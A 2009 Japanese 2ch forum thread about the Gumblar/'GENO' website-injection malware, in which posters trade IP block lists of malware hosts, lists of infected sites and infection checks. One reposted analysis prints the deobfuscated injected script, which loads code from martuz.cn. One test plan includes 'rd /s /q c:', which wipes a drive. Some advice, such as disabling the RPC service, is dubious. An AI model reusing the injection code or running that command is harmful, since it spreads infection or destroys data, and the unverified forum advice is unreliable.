【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】
1 :
ドデカテオン メディア(catv?) :
2009/05/17(日) 19:16:35.06 ID:NijB5Tnh BE:1254343076-PLT(16000) ポイント特典
2 :
キブシ(東京都) :2009/05/17(日) 19:17:02.58 ID:lkGVu3aj
あうあうあー(^q^)ノ
3 :
水芭蕉(福岡県) :2009/05/17(日) 19:17:05.77 ID:qrwxe2qC
小林製薬の糸ようじ
小林製薬の糸ようじ
5 :
モリシマアカシア(関西地方) :2009/05/17(日) 19:18:13.17 ID:+MGVg9A6
6 :
キブシ(東京都) :2009/05/17(日) 19:18:30.05 ID:lkGVu3aj
対策 Flash PlayerとPDFリーダーを最新のものにする おわり(^q^)
8 :
カタクリ(千葉県) :2009/05/17(日) 19:18:58.24 ID:KLsPwtoF
俺、決してNGを使わないで糞コテもちゃんと見る派だったのに、 今回だけは入れてやるんだ。NG。
ネットカフェとか店先のPCとかな
10 :
ネメシア(関東地方) :2009/05/17(日) 19:19:25.61 ID:exjCFmyF
>>6 VistaユーザーならUAC有効にしてればおk
1か月前に液晶のバックライトが切れたから買い替えて良かったかも
ノートかよ
なんで5なの?
14 :
ドデカテオン メディア(catv?) :2009/05/17(日) 19:22:26.80 ID:NijB5Tnh BE:955689784-PLT(16000)
6だと思ってくれ。
15 :
オウレン(山口県) :2009/05/17(日) 19:22:28.82 ID:TbUW2CvG
16 :
チチコグサ(アラバマ州) :2009/05/17(日) 19:22:53.84 ID:00pmgETL
一目で判るGENOたんの一日☆ こんにちは、GENOっていいます (幼女ウイルス) 第一感染 ↓ あっ、また会ったね、お兄ちゃん。それじゃあ遊ぼっか! 再起動で発動 ↓ お姉ちゃん、こっちで一緒に遊ぼうよ! 勝手に海外のサイトからお姉ちゃんウイルスDL 姉「うっしゃ暴れるぞ」 ↓ もうあたし一人でだいじょうぶだもん! 再起動で不老の無敵幼女発動 ↓ お兄ちゃんの家に行きたいな〜…… 知らずにサイト更新する ↓ へぇ〜、お兄ちゃん家って、こんな鍵使ってるんだぁ。 FTPパス送信 ↓ えへへ、合鍵、作っちゃった♪ あ、お隣さんが回覧板届けに来てあたしの事尋ねてきたから お嫁さんですって言っちゃった!えへへ BOTがサイトに不正アクセスして改竄 ↓ えへへ、本当にお嫁さんになっちゃったね♪ 野球チームできるくらい、いーっぱい子供作ろうねっ♪ 自分のサイトがもれなく幼女ウイルス配布 ↓ 上に戻る
17 :
オランダミミナグサ(長屋) :2009/05/17(日) 19:23:31.08 ID:JmDW7GMT
ビスタなんだけど、何もしてないのにHDDにアクセスまくってるんだけどウイルスかかったのかえ?
18 :
プリムラ・ヒルスタ(埼玉県) :2009/05/17(日) 19:24:05.18 ID:W7zECwLz
まさかのVista厨の逆襲 セキュリティ強化したゲイツの勝利だな 7のUACがクソと呼ばれる日も近いか
730 : リナリア アルピナ(中部地方):2009/05/17(日) 14:08:06.53 ID:PA1MHOB9
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
http://tsushima.2ch.net/test/read.cgi/news/1242521524/730
22 :
プリムラ・マラコイデス(catv?) :2009/05/17(日) 19:25:38.29 ID:tTs2xyC/
感染予防対策(1) 1.Adobe Flash Player の最新版にアップデート 2.Adobe Acrobat Reader の最新版にアップデート 3.NoScriptの導入(Firefoxの導入) 4.Adobe Acrobat Readerの JavaScript 機能OFF 5.危険IPのブロック 諸事情でAdobe Reader 最新版を使わざるを得ない場合 2009年4月29日現在の最新版バージョン9.1設定例 1.Adobe Readerを起動し「編集」メニューの「環境設定」 「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す) OKを押して設定確定後、Adobe Readerを終了。 ↓ 2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理 設定は SpeedUp - Fast がおすすめ。 注意すべきは Acroform(拡張子なし) Annotations(拡張子なし) これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。 そうしないと Adobe Reader が起動しなかったりする。 このとき追加作業として EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと より安心かもしれない。
23 :
スズナ(埼玉県) :2009/05/17(日) 19:25:47.20 ID:Gax1nOD3
まとめサイト重いぞ あとGEONのイメージ悪くなるぞ お前等許されないぞ
24 :
菜の花(山形県) :2009/05/17(日) 19:25:54.97 ID:ImXjuYM0
25 :
カンパニュラ・アーチェリー(東日本) :2009/05/17(日) 19:26:26.82 ID:9PDqnnz3
239 :名無しさん@お腹いっぱい。:2009/05/15(金) 02:39:15
最近流行のgumblar関連の焼き推奨一覧
hostflesh:58.65.232.0-58.65.239.255
nicovedeo:61.139.0.0-61.139.127.255
chunghwa:61.219.39.0-61.219.39.255
chinarailway1:61.235.117.0-61.235.117.255
chinarailway2:61.237.236.0-61.237.236.255
fakeav:63.146.2.0-63.146.2.255
hivelocity:69.46.0.0-69.46.31.255
bluehost:74.220.215.0-74.220.215.255
datacenterhosting:78.109.16.0-78.109.31.255
netdirect:78.159.112.0-78.159.115.255
fakevideo:82.146.48.0-82.146.55.255
xs4all:83.68.16.0-83.68.16.255
xentronix:85.12.43.0-85.12.43.255
colocation:85.14.6.0-85.14.6.255
leaseweb:85.17.0.0-85.17.255.255
strato:85.214.90.0-85.214.90.255
gaztranzitstroyinfo-net1:91.211.64.0-91.211.65.255
gaztranzitstroyinfo-net2:91.212.41.0-91.212.41.255
gaztranzitstroyinfo-net3:91.212.65.0-91.212.65.255
bastiontradegroup:94.232.248.0-94.232.255.255
gumblar-russian:94.229.64.0-94.229.79.255
zlkon.lv:94.247.2.0-94.247.3.255
madet:195.2.252.0-195.2.253.255
americanstandard:206.44.0.0-206.44.255.255
1/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240
>>17 Vistaに標準でついてる児童デフラグがとまらないで終わってるんだと思えばいい。
27 :
プリムラ・ヒルスタ(埼玉県) :2009/05/17(日) 19:27:15.99 ID:W7zECwLz
28 :
カンパニュラ・アーチェリー(東日本) :2009/05/17(日) 19:27:29.88 ID:9PDqnnz3
240 :名無しさん@お腹いっぱい。:2009/05/15(金) 02:39:58
zbot1:209.44.100.0-209.44.100.255
zbot2:209.44.126.0-209.44.126.255
zbot3:209.62.7.0-209.62.7.255
zbot4:209.102.247.0-209.102.247.255
zbot5:209.250.241.0-209.250.241.255
zeus1:209.44.96.0-209.44.127.255
zeus2:82.146.50.202
pacnet1:209.205.192.0-209.205.223.255
pacnet2:209.205.224.0-209.205.239.255
chinaunicom:211.90.0.0-211.97.255.255
zlkon:212.117.160.0-212.117.191.255
latvia:213.182.192.0-213.182.223.255
vundo1:216.39.48.0-216.39.63.255
vundo2:216.39.62.0-216.39.62.255
chinanet:218.90.0.0-218.94.255.255
2/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240
29 :
プリムラ・マラコイデス(catv?) :2009/05/17(日) 19:27:43.32 ID:tTs2xyC/
感染予防対策(2) 危険ポートを閉じることでセキュリティを強化する。 【ポート135の役割】 Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。 このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。 遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。 場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。 ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」 ■ポート135を閉じる 「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。 「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」 をダブルクリックし、プロパティを開く。 スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。 変更をしたらPCを再起動する。 ポート番号「445」、「ファイル共有等のサービスへのアクセス」 ■ポート445を閉じる 「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから 「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。 このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。 ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。 変更をしたらPCを再起動する。 以下はお約束 上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。 またAdobe Reader&各ポートの環境設定をどうするかも各自考える必要があります。
30 :
ハナワギク(新潟・東北) :2009/05/17(日) 19:29:02.65 ID:1oH/gZoc
31 :
( ● ´ ー ` ● ) はスバラシイ :2009/05/17(日) 19:29:28.61 ID:k92X7j1c BE:4495542-PLT(12000)
小林製薬とか普通にCMしてるけど、差し替えて謝罪CM入れるべきなんじゃないの?
まあ、銀イオン詐欺やってる犯罪企業にとってみれば
たいした問題じゃないのかもだけど
ubuntuのサブ機使お しかし重いお…
33 :
キブシ(catv?) :2009/05/17(日) 19:31:07.58 ID:w8KdrlSp
で、niftyの話はどうなったんだ?
34 :
キブシ(東京都) :2009/05/17(日) 19:32:30.13 ID:lkGVu3aj
VistaはUACオンなら、IEの保護モードで守りは鉄壁に近いはず
36 :
サンシュ(長屋) :2009/05/17(日) 19:33:04.70 ID:w2uGYIbu
そもそも製薬企業というより、雑貨みたいなもんだよな・・。
37 :
イベリス・ウンベラタ(西日本) :2009/05/17(日) 19:34:04.45 ID:J54oGTbS
実行された場合、ウイルス対策ソフト入れてれば殆どどれでもアラート反応する 反応したスクリプトを許可するなんてバカなことしなければ感染しない
38 :
カラスビシャク(埼玉県) :2009/05/17(日) 19:34:51.69 ID:4sYNvOMI
39 :
ホトケノザ(コネチカット州) :2009/05/17(日) 19:35:14.28 ID:s2pS2D1S
981 イワウチワ(大阪府) sage 2009/05/17(日) 19:28:23.11 ID:j5QqoQFP
>>868 これもChromeチェックがあるのを確認した
スクリプトではChromeを除外、つまりChromeの時はスルー
ブラウザがクロームならGENOに感染しないってこと?
40 :
キュウリグサ(福岡県) :2009/05/17(日) 19:35:58.15 ID:QQkT0wna
XPで踏んでみるから 検証してほしいことがあったら言ってくれ
>>31 ・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
42 :
ノゲシ(栃木県) :2009/05/17(日) 19:36:24.73 ID:Nj5QC+P5
> ブラウザがクロームならGENOに感染しないってこと? 俺、前クロームでGENO踏んだけど、クロームが落ちるだけで感染しなかったんだよね。
43 :
ハナワギク(群馬県) :2009/05/17(日) 19:36:50.94 ID:i0sh18L4
同人サイトって販売してるようなサイト?
>>38 >■何をしたらいいか分からない人はまずここを見る。
>→ww.seibidoshuppan.co.jp/
>何をすれば良いか良く分からない人用のまとめ
★★★おそらく感染サイトなので注意 罠です★★★
45 :
オウレン(山口県) :2009/05/17(日) 19:37:02.34 ID:TbUW2CvG
46 :
スズナ(東京都) :2009/05/17(日) 19:37:12.76 ID:VZD8/13g
漏れのブラウザはChromiumなので感染しないのかな? なら安心してネットできる
286 名前:以下、名無しにかわりましてVIPがお送りします[sage] 投稿日:2009/05/17(日) 19:23:09.84 ID:9JkQNPk40
881 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:19:07
ダム板から着ました。
Chrome対応の亜種が出たっぽい予感。
884 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:19:47
>>881 ソース
890 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:22:10
>>884 個人のサイトだったからスレで。
http://tsushima.2ch.net/test/read.cgi/news/1242541194/935
48 :
ショウジョウバカマ(三重県) :2009/05/17(日) 19:38:02.43 ID:M5Qp0TJq
>>40 できれは、IE6、IE7、IE8の場合わけで。
50 :
スズナ(埼玉県) :2009/05/17(日) 19:38:21.96 ID:4QuIVfhI
>>44 危険度1000%
超絶危険なURLです。友人の(ry
絶対に踏んではいけません。
51 :
キュウリグサ(福岡県) :2009/05/17(日) 19:38:50.39 ID:QQkT0wna
52 :
カラスビシャク(埼玉県) :2009/05/17(日) 19:38:59.13 ID:4sYNvOMI
νカスのくせにつまんねーなおい
53 :
クチベニシラン(埼玉県) :2009/05/17(日) 19:39:38.27 ID:X6dMpG99
デイリーポータル感染してたら困る
55 :
キュウリグサ(福岡県) :2009/05/17(日) 19:40:27.95 ID:QQkT0wna
>>49 ブラウザのバージョンごとの検証か・・・
これ簡単にやる方法ってある?
>>47 Chrome除外指定でChromeの時はスルーだと思うんだ
つまりウイルス起動しない
57 :
ホトケノザ(コネチカット州) :2009/05/17(日) 19:40:37.94 ID:s2pS2D1S
>>42 ありがとう
UCA入れてたのにろくに相手していなかったから
すごく不安だったけど安心しました
>>41 ・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
論外
・GENO(PC通販ショップ)【証拠隠滅済】
これ位やるべきだろ
59 :
コメツブツメクサ(関東・甲信越) :2009/05/17(日) 19:40:54.97 ID:9r57wE3r
pixivはまだかー
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」 ―――――――――――――‐┬┘ | ____.____ | .__ いらないPCを | | | | |\_\ 窓から | | ∧_∧ | | | |.◎.| 投げ捨てろ | |( ´∀`)つ ミ | | |.: | | |/ ⊃ ノ | | .\|.≡.|  ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
62 :
キュウリグサ(福岡県) :2009/05/17(日) 19:41:40.44 ID:QQkT0wna
>>54 ヘ⌒ヽフ
( ・ω・) dd!
/ ~つと)
63 :
ビオラ(茨城県) :2009/05/17(日) 19:42:15.09 ID:7tdmFQrU
てか2ch以外で話題になってないね。 GENOの風評被害だとかいって自粛してるのかね?
64 :
セントランサス(福岡県) :2009/05/17(日) 19:42:25.67 ID:8fJCqosV
【感染の確認方法】 @cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「regedit.exe」と入力して「OK」ボタンを押す。 ※立ち上がったことを確認したら弄らず閉じること。 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す ※立ち上がったことを確認したらAへ Asqlsodbc.chmのファイルサイズの確認を確認する ■Windows XP: 改ざんされていなければ C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes ■Windows 2000: そもそも存在しないはずなので、 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ■確認方法 1.スタートから「ファイル名を指定して実行」 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に 「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す →背景が黒いウィンドウが開いた場合3へ →起動しない場合:感染疑い濃厚 3.背景が黒いウィンドウを選択。 小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー Bavast!(無料のアンチウイルスソフト)で確認
65 :
クヌギ(埼玉県) :2009/05/17(日) 19:42:26.05 ID:A0zthT+g
危険度の%の数字の根拠は何だ
66 :
スズナ(栃木県) :2009/05/17(日) 19:42:38.29 ID:gVr2iNRx
ニフティって結局なんだったのよ 俺はアクセスしたけど感染しなかったぞ アクセスしたのは昨日だけど
67 :
スズナ(東京都) :2009/05/17(日) 19:42:45.91 ID:VZD8/13g
DPZ危険度1pt
68 :
マツバウンラン(コネチカット州) :2009/05/17(日) 19:42:55.19 ID:/k6fqCn1
中古本売ってる某サイトも感染しとる
69 :
キュウリグサ(福岡県) :2009/05/17(日) 19:43:21.90 ID:QQkT0wna
>>60 今まさにそれでやってるんだが
今の仮想環境が8G越えだからコピーに時間かかるんだよなw
まっいっか一個一個やってみるよ
70 :
サンシュ(東京都) :2009/05/17(日) 19:43:24.07 ID:TVbfxF0n
一次ソースたる情報が無い上に一次ソースらしきURL貼られても感染が怖くて踏めない 恐怖が人を支配する
71 :
セントランサス(福岡県) :2009/05/17(日) 19:43:40.63 ID:8fJCqosV
正常なsqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3 上書きされたsqlsodbc.chmの例(あくまで例でありこの限りではない) ファイルサイズ:1,323 バイト CRC32:7585CBB6 MD5:BF7209B9589AD09A25740F6D47D0ADEA SHA-1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
>>66 誰も触ってない時点でわかるだろ
完全なデマで結論でてる
ちなみにスレ立てた奴はsakuられた
このスレのURLは踏まない
結局、アドビ関連をアップデートしまくればいいの?
75 :
オステオスペルマム(アラバマ州) :2009/05/17(日) 19:44:13.40 ID:9B2x1c99
2ちゃんのスレで対策をコピペされても信憑性がまったくないんだよな。 読む気にもならん。 さっさとウィルスを検出可能なオンラインスキャンをかけたほうが早いだろw
76 :
スズナ(埼玉県) :2009/05/17(日) 19:44:20.71 ID:4QuIVfhI
まとめサイト見るの怖いから 具体的サイト名を教えろ
>>55 IE7かIE8だと感染しない可能性のある
レスをみた。これから探すから、ちょっと待ってくれ。
79 :
サンダーソニア(東京都) :2009/05/17(日) 19:44:34.50 ID:Qtky1iiK
ネット見るのはMacでいいだろ
80 :
セントランサス(福岡県) :2009/05/17(日) 19:44:42.67 ID:8fJCqosV
15 名前:genoウイルス被害者の会”管理”人[] 投稿日:2009/05/17(日) 03:13:20.26 ID:BRx1b5y4P 大事な事思い出した 【コマンドプロンプトが開かない】 ↑これは感染の判断基準になるけども、 感染初期(除去可能な時期)にコマンドプロンプトを開くと 一気に親玉感染して重症化する。 安易にDOS窓ひらいちゃだめだ 92 名前:genoウイルス被害者の会”管理”人[] 投稿日:2009/05/17(日) 03:26:16.11 ID:BRx1b5y4P おまえら c m d を 起 動 す る な 感染してたらコレが命取りになるよ 感染の確認ならレジストリエディタを開けるかでいい DOS窓で確認しちゃいかん 絶対。
81 :
フクシア(神奈川県) :2009/05/17(日) 19:45:28.61 ID:cZ85gIrd
てかGENOウィルスってなんだよまるでPC通販GENOが諸悪の根源みたいじゃないか
82 :
セントランサス(福岡県) :2009/05/17(日) 19:45:40.14 ID:8fJCqosV
初期のGenoウイルスと比べてはるかに進化してるな・・・・・・
>>81 多分わざと言ってるんだろうが
ある意味そうだろ
まあ、感染してる奴って思ったより多くない
局地的現象なんじゃないかとは思ってるが
86 :
藤(東京都) :2009/05/17(日) 19:46:52.91 ID:++//WVOB
>>38 seibidoのURL踏んだらavastが鳴ったぞ
87 :
ヒサカキ(長屋) :2009/05/17(日) 19:46:56.43 ID:PpDa/RmV
なるほど それでアクロバットリーダーがあわてて9.1にウプしたんだ
パソコン蛾ぶっ壊れた
89 :
:2009/05/17(日) 19:48:32.04 ID:fzWpD+g0
90 :
西洋オキナグサ(アラバマ州) :2009/05/17(日) 19:49:06.18 ID:pcmoTSzk
>>55 ごめん。記憶違いだった。
555 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:30:25
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね
583 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:35:13
>>555 いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。
Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。
92 :
マツバウンラン(コネチカット州) :2009/05/17(日) 19:49:55.36 ID:/k6fqCn1
危険度100000000000
93 :
カラスビシャク(埼玉県) :2009/05/17(日) 19:50:22.33 ID:4sYNvOMI
同人だと大量に釣れるから面白い
これはそんなに怖いもんじゃないだろ。 接続状況の監視しておけばいいだけだし。
>>91 532 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:26:33
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる
548 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:29:31
>>532 jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。
586 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:35:24
>>548 どれも同じだよ。
>>324 確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。
96 :
ペチュニア(アラバマ州) :2009/05/17(日) 19:51:59.93 ID:kILx2QCt
97 :
キュウリグサ(福岡県) :2009/05/17(日) 19:52:32.09 ID:QQkT0wna
>>91 おっ!サンクス
まぁいろいろまぁいろいろと試してみるよ
現在検証するブラウザ
IE6
IE7
IE8
Firefox最新版
Opera最新版
Chome最新版
こんなところかな?
98 :
ヤエヤマブキ(和歌山県) :2009/05/17(日) 19:52:38.25 ID:BHu037V6
99 :
藤(東京都) :2009/05/17(日) 19:52:39.74 ID:++//WVOB
>>90 avastは心配スンナって言ってくれたよ
100 :
リナリア(catv?) :2009/05/17(日) 19:53:26.00 ID:tKod5V+I
まるでエヴァみたいだな
>>95 680 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 23:58:32
var j = "", u = navigator.userAgent;
if(
(u.indexOf("Chrome")<0) && //Chrome以外ならtrue
(u.indexOf("Win")>0) && //Windowsならtrue
(u.indexOf("NT 6")<0) && //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
(document.cookie.indexOf("miek=1")<0) &&
(typeof(zrvzts)!=typeof("A"))
){
zrvzts="A";
if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ)
}
document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね
698 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 00:03:06
>>680 違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。
102 :
ペチュニア(関西地方) :2009/05/17(日) 19:54:25.64 ID:LnCZFSjE
なんか思いと思ったらこれか でもAVG入れてるから問題ない
人間もPCもウイルスにかかってる もう外も中もだめだ
104 :
オニタビラコ(岡山県) :2009/05/17(日) 19:55:12.29 ID:oXWmrp4X
UAで弾いてるなら、UA偽装すれば安全って事? 誰か試してくれ
106 :
ショウジョウバカマ(三重県) :2009/05/17(日) 19:56:10.97 ID:M5Qp0TJq
軟弱な豚インフルよりこっちのがよっぽど面白いな
C:\WINDOWS → %WINDIR%
108 :
キュウリグサ(福岡県) :2009/05/17(日) 19:56:36.84 ID:QQkT0wna
とりあえず踏んだ後だが ・cmd.exeとregedit.exeが起動するか確認 ・タスクマネージャーでcmdが動いてないか確認 ・CPU使用率をチェック ・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認 ・最後cmdからrd /s /q c:を実行 とこんな感じで試していくけど 他に何かある?
109 :
スズナ(東京都) :2009/05/17(日) 19:56:49.33 ID:VZD8/13g
>>97 Chrome最新版っていわれてもな…StableとBetaとDevがあるんだが
vista 64bitって、最近じゃ使い勝手大丈夫かね?XPの64bit版よりかは格段って聞いてるけど。 7の64bitまで待とうかって思ってたけど、これねあるんじゃ繋ぎに買ってみようかな。
111 :
セントウソウ(長屋) :2009/05/17(日) 19:57:05.91 ID:c5VF1Ttf
112 :
タニウズキ(神奈川県) :2009/05/17(日) 19:57:10.36 ID:RddtXoK4
いろんなサイトのソース見てウイルス確認したけど、 成美堂出版ってどこにウイルスがあるの? ソース見て確認したけどわからん
>>41 株式会社りぶメール(www.livmail.com/3others-page/janet/tokusen/index.htm)
未対策
114 :
キュウリグサ(福岡県) :2009/05/17(日) 19:57:44.69 ID:QQkT0wna
>>109 通常最新版と言ったら
公式からダウンロードできるものじゃないの?
>>104 324 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 22:24:31
>>221 >>1 のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ
p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/
うざい警告が初めて役に立ったって感じだvista お前らざまあああああwwwwwww
>>108 >最後cmdからrd /s /q c:を実行
これはやらなくていいだろw
遊ばないで検証を続けてくれ
で、サーバーにはどんな経路で侵入してるんだ? OSの脆弱性?アプリケーションの脆弱性?
119 :
ヒヤシンス(神奈川県) :2009/05/17(日) 19:58:36.19 ID:4IBC9DeW
感染してるサイトまとめってないの?誰か便利な〜リンク集みたいなの作ってくれ
>>108 ・Acrobatが勝手に起動
これは?
121 :
桜(福岡県) :2009/05/17(日) 19:58:41.66 ID:aKpz6ARH BE:371769942-2BP(2)
123 :
キュウリグサ(福岡県) :2009/05/17(日) 19:58:57.63 ID:QQkT0wna
124 :
ガザニア(千葉県) :2009/05/17(日) 19:59:10.39 ID:uHq4dfUe
セキュリティホールの戦犯は誰だよw いまどきflash(笑)とかJavaScript(笑)使ったウェブサイトってwww
125 :
ツメクサ(北海道) :2009/05/17(日) 19:59:13.17 ID:/y1olQuo
ウィルスがupdateするのはわかったんだが、それって悪意持った第三者がやってんの? さすがに自己改善・自己進化できるウィルスは映画脳だよな…
126 :
レブンコザクラ(愛知県) :2009/05/17(日) 19:59:48.27 ID:L36YVK/T
結局ふたば感染はガセだったの?
戦犯(笑)
129 :
フクシア(神奈川県) :2009/05/17(日) 20:00:56.90 ID:cZ85gIrd
130 :
プリムラ・ヒルスタ(埼玉県) :2009/05/17(日) 20:01:04.15 ID:W7zECwLz
セキュリティホールの戦犯? わざわざダウングレードしてXP入れた奴だろ ゲイツ万歳!
>>118 ん、つまりコンテンツアップロード者が感染してるってことか?
管理責任かよwww
132 :
桜(福岡県) :2009/05/17(日) 20:01:33.25 ID:aKpz6ARH BE:371769942-2BP(2)
同人サイトを攻撃するってことはこのウイルスって善玉菌?
同人板はホント情弱ばっかだな
137 :
セントランサス(福岡県) :2009/05/17(日) 20:02:53.42 ID:8fJCqosV
これwindows updateじゃ防げないのがタチ悪い
138 :
オキザリス(東京都) :2009/05/17(日) 20:03:04.11 ID:OT2LLMTM
>>118 PCに感染するとFTPとかのパケット監視をはじめて
そのPCがFTPなどに接続するとIDとパスワードを取得して他の感染PC達に通知。
そのIDとパスワードを使って、サイトにスクリプトを追加。
139 :
スズナ(東京都) :2009/05/17(日) 20:03:09.22 ID:VZD8/13g
140 :
ビオラ(東京都) :2009/05/17(日) 20:03:17.89 ID:Oyq6gpkG BE:186899322-2BP(150)
141 :
サンシュ(東京都) :2009/05/17(日) 20:03:46.82 ID:TVbfxF0n
142 :
キュウリグサ(福岡県) :2009/05/17(日) 20:03:49.31 ID:QQkT0wna
>>120 おk
>>134 おk
◆現在の検証予定◆
○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが動いてないか確認
・CPU使用率をチェック
・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認
・Acrobatが勝手に起動
・最後cmdからrd /s /q c:を実行
○検証するブラウザ
IE6
IE7
IE8
Firefox Stable最新版
Opera Stable最新版
Chome Stable最新版
